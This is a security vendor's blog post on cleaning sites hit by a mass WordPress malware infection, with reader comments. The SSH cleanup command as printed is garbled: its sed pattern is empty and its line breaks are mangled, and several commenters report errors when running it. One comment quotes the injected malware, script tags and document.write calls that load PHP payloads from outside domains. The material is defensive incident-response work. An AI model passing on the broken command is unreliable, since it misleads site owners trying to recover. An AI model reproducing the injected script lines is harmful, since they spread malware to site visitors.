Home » Uncategorized » Simple cleanup solution for the latest WordPress hack

Simple cleanup solution for the latest WordPress hack

If your site got hacked on the last mass infection of WordPress sites out there, we have a simple solution to clean it up.

For Network Solutions users:

If your site is at Network Solutions, and you have that “virtual-ad.org” malware, the solution is simple.

Login via FTP and remove the file cgi-bin/php.ini. That’s all you need to do to protect your users.

You will still have some “.nts” files in there (which you can remove later), but they will not be executed without the php.ini.

Via SSH:

If you have SSH access to your server, run the following commands on your web root:

$ find ./ -name "*.php" -type f | \  xargs sed -i 's###g' 2>&1$ find ./ -name "*.php" -type f | \   xargs sed -i '/./,$!d' 2>&1

Via web:

If you don’t have SSH access, download this file to your desktop:
http://sucuri.net/malware/helpers/wordpress-fix_php.txt and rename it to wordpress-fix.php.

After that, upload it to your site via FTP, and run it (using your browser) as: http://yoursite.com/wordpress-fix.php

This script will take a few minutes to complete, but will scan your whole site and remove the malware entries.

Once you are done, go back to your site and remove this file.

That’s it and you should be clean again.

UPDATE: If your site is not getting cleanup after you run it (or you are getting extra empty lines on the top of your files), it means that the script didn’t finish to run properly. Try running it again. It it doesn’t help, upload it to some sub directories (like wp-admin, wp-content and wp-includes) and run directly from there. For example:
http://yoursite.com/wp-admin/wordpress-fix.php , http://yoursite.com/wp-content/wordpress-fix.php , etc.
That should fix it!

As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

This entry was posted in Uncategorized and tagged , , , . Bookmark the permalink.

121 Responses to Simple cleanup solution for the latest WordPress hack

  1. Anonymous says:

    Hello Guys,

    I am also a victim.My suggestion is that if you are using any plugins like javascript and CSS optimizer then remove it. It's and RFI attack.Hope you all be happy with this.The attacker first distribute free program (open source) which working fine but he puts a security hole init for later use.He win the faith from us and then attack.

  2. Amy says:

    Thank you so much!

  3. Pingback: Tweets that mention Simple cleanup solution for the latest Wordpress hack | Sucuri Security -- Topsy.com

  4. Pingback: WordPress-based, GoDaddy-hosted websites hacked

  5. james says:

    If you are on Media Temple, i had 5 blogs, found wordpress templates infected. I suspect my laptop was the fist victim via malware, although not sure. Cleaned that up. Then used script from here. Cleaned it each time, but every day i would see somehow the hackers had reuploaded new exploit-laden akismet plugins onto the server. My latest discovery was that in the folder etc if you login in using ftp, they infected my php.ini file. You need to remove the last line on that file and then delete the sample.php.ini file which hosted malware. Now all clean again, but waiting for a few days to see if they come back (wish me luck!)

  6. Bruce says:

    Thank you so much for the Quick Fix! So far everything looks good but will keep an eye on it.

  7. Pingback: Attack on Wordpress – "http://www.indesignstudioinfo.com/ls.php" – Themes 'n' Templates Base

  8. MacMyDay says:

    i run this script and i find that i get an error:

    -bash: : command not found
    running this:
    $ find ./ -name "*.php" -type f | xargs sed -i 's###g' 2>&1
    My recent post iOS4 iPhone 4 Release Day Apple Store

  9. Evan says:

    My WP was hacked on bluehost (3 sites). I ran the script but still see suspecious Java script in my footer when view the page source in the browser. You can see at internetincomeformula.com I have viewed the theme editor in the admin looking for this code in the footer. It is nowhere to be found. But when I view the page source code in my browser I can see this java script. How do I remove it?

  10. eckert says:

    i ran this on 5 WP sites, only to then find them all white-screened. i was able to find the malicious code on a couple of them, but it's not showing up on one in particular. if anyone has any suggestions, they would be much appreciated.

  11. Pingback: Yet another series of attacks – This time using whereisdudescars.com | Sucuri

  12. sang truong says:

    Seems like everyone has got it to work but i am having so much problem. I keep getting a 404 or
    Warning: Unexpected character in input: ” (ASCII=92) state=1

    Parse error: syntax error, unexpected T_STRING

    Appreciate any help

  13. mauma says:

    good, but if you have installed nextgenGallery remove the plug-in code that is used instead.
    make sure that your plug-ins do not use encode_64 before making this operation

  14. George says:

    All my PHP files were infected by:

    All my HTML files were infected by:
    <script src =http:// rubydistributions. com/imgs/cardgood .php >
    All my “js” files were infected by:
    document.write(‘<script src =http:// rustytolin. com/images/gifimg. php >’);

    document.write(‘<script src = http:// rubydistributions. com /imgs/cardgood . php >’);

    It was only the one attack and so many kind of files were infected.

  15. George says:

    Also malware create infected files "robots.php" and gifimg.php in "images" category of website

  16. Rick says:

    Please help me perform this step:
    If you don’t have SSH access, download this file to your desktop: http://sucuri.net/malware/helpers/wordpress-fix_p... and rename it to wordpress-fix.php.

    How do you download a 'text' file to your desktop? Thanks.

  17. Rick says:

    Please help me perform this step:
    If you don’t have SSH access, download this file to your desktop: http://sucuri.net/malware/helpers/wordpress-fix_p.... and rename it to wordpress-fix.php.

    How do you download a 'text' file to your desktop? Thanks.

  18. Michelle says:

    I used it on my main domain and then some sub directories and got two different results. I'm assuming one means it ran and was ok, then the other means it found something and cleaned it up. Is that right? I'm pasting them below.

    1. Site remediated by Sucuri
    This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1

    If you need help, contact support@sucuri.net or visit us at Sucuri.net

    Site remediated by Sucuri
    This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1

    If you need help, contact support@sucuri.net or visit us at Sucuri.net

    2. Site remediated by Sucuri
    This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1

    If you need help, contact support@sucuri.net or visit us at Sucuri.net

    Malware removed.
    Empty lines removed.

    Completed.
    My recent post Photos- Castle McCulloch

  19. Marisa says:

    This worked for me but I had to run it several times and place it in my wp-admin directory on some of my blogs. Of 11 WP blogs, only the one at the root had to be run repeatedly. Also, I found a file, wtm.php that had nothing but the malicious code. I blew that one away manually.

    Since this is the third time I’ve been infected, my question now is how do I protect my blogs? Is there any way to make wordpress secure? My wp is update, I’ve placed recommended in my htaccess file and placed that file in each of my wp-admin directories. Is there anything else I can do? I really don’t have time to do this every few days and I don’t have the money to hire someone else to do it for me.

    Any ideas on how to secure WP?

  20. Anon says:

    When I run the command from ssh I get:

    -bash: 1$: ambiguous redirect
    -bash: : command not found

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Home » Uncategorized » Simple cleanup solution for the latest WordPress hack